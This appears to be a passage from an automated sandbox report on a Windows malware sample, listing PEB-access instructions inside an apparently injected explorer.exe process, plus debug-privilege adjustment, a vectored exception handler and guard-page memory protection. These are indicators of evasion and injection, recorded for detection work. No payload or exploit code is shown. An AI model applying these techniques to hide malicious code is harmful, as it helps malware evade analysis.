Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485B390 mov eax, dword ptr fs:[00000030h] 5_2_0485B390
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04838794 mov eax, dword ptr fs:[00000030h] 5_2_04838794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F5BA5 mov eax, dword ptr fs:[00000030h] 5_2_048F5BA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A53CA mov eax, dword ptr fs:[00000030h] 5_2_048A53CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A53CA mov eax, dword ptr fs:[00000030h] 5_2_048A53CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484DBE9 mov eax, dword ptr fs:[00000030h] 5_2_0484DBE9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048637F5 mov eax, dword ptr fs:[00000030h] 5_2_048637F5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F070D mov eax, dword ptr fs:[00000030h] 5_2_048F070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F070D mov eax, dword ptr fs:[00000030h] 5_2_048F070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A70E mov eax, dword ptr fs:[00000030h] 5_2_0485A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A70E mov eax, dword ptr fs:[00000030h] 5_2_0485A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484F716 mov eax, dword ptr fs:[00000030h] 5_2_0484F716
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E131B mov eax, dword ptr fs:[00000030h] 5_2_048E131B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFF10 mov eax, dword ptr fs:[00000030h] 5_2_048BFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFF10 mov eax, dword ptr fs:[00000030h] 5_2_048BFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04824F2E mov eax, dword ptr fs:[00000030h] 5_2_04824F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04824F2E mov eax, dword ptr fs:[00000030h] 5_2_04824F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485E730 mov eax, dword ptr fs:[00000030h] 5_2_0485E730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482DB40 mov eax, dword ptr fs:[00000030h] 5_2_0482DB40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483EF40 mov eax, dword ptr fs:[00000030h] 5_2_0483EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8B58 mov eax, dword ptr fs:[00000030h] 5_2_048F8B58
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F358 mov eax, dword ptr fs:[00000030h] 5_2_0482F358
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482DB60 mov ecx, dword ptr fs:[00000030h] 5_2_0482DB60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483FF60 mov eax, dword ptr fs:[00000030h] 5_2_0483FF60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8F6A mov eax, dword ptr fs:[00000030h] 5_2_048F8F6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04853B7A mov eax, dword ptr fs:[00000030h] 5_2_04853B7A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04853B7A mov eax, dword ptr fs:[00000030h] 5_2_04853B7A
Enables debug privileges
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00481F2C KiUserExceptionDispatcher,IntersectClipRect,GetSystemMetrics,GetSystemMetrics,ExitProcess,IntersectClipRect,RtlAddVectoredExceptionHandler,IntersectClipRect, 0_2_00481F2C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Memory protected: page read and write | page guard Jump to behavior